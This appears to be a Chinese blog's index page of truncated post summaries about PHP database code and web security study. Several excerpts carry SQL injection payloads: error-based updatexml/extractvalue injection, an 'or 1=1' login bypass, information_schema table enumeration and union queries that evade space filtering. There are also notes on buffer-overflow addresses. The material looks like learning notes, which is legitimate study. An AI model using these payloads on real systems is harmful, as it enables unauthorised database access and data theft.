摘要： <?php namespace app\controller; use app\BaseController; use think\facade\Db; class Index extends BaseController { public function index13(){ #$query=D 阅读全文

摘要： <?php $dsn = "mysql:dbname=phpblog;host=127.0.0.1"; # $PDO为 pdo基类的实例 $pdo = new PDO($dsn,'root','root'); #1.如果不根据用户传过来的值进行操作,可以直接query sql $sql = "sel 阅读全文

摘要： 1' and updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1)# 1' and extractvalue(1,concat(0x7e,user(),0x7e,database())) # SQL注入实战之报错注入篇（u 阅读全文

摘要： select group_concat(table_name) from information_schema.tables where table_schema=database(); ## 查看表名 ## student, user, passwd select group_concat(col 阅读全文

摘要： #1.万能注入 'or 1=1 -- '#select * from users where username=' ' or 1=1 -- 'and password='admin4' #一·数字型注入判断#1.?id=1'#select * from users where id=1';数字型则报 阅读全文

摘要： 这个报错通常是因为在 UPDATE 语句中使用了子查询，并且子查询中引用了待更新的目标表（例如 'users' 表）。这会导致 MySQL 报错，因为 MySQL 不允许在子查询中直接引用待更新的目标表，以防止出现不确定的结果。 以下是一个示例和可能的报错原因： sql -- 尝试更新 'users 阅读全文

摘要： #1.万能注入 'or 1=1 -- '#select * from users where username=' ' or 1=1 -- 'and password='admin4' #一·数字型注入判断#1.?id=1'#select * from users where id=1';数字型则报 阅读全文

摘要： use security;#()绕过空格，查表#way1:union子查询select id,username,password from users where id=1 or 1=1 union(select 2,(select (group_concat(table_name))from(in 阅读全文

摘要： ebp是函数调用栈的尾指针，大小为4个字节 但是需要注意的是，由于在计算机内存中，每个值都是按照字节存储的。一般情况下都是采用小端存储，即 0x0804843B 在内存中的形式是 \x3b\x84\x04\x08 但是，我们又不能直接在终端将这些字符给输入进去，在终端输入的时候 \，x 等也算一个单 阅读全文

摘要： use stu;#修改基本表 #1.增新属性列#alter table sc add Smo varchar(10) not null;#2.增列级约束#alter table sc add unique(Smo);#3.增列级约束表级#alter table sc add foreign key( 阅读全文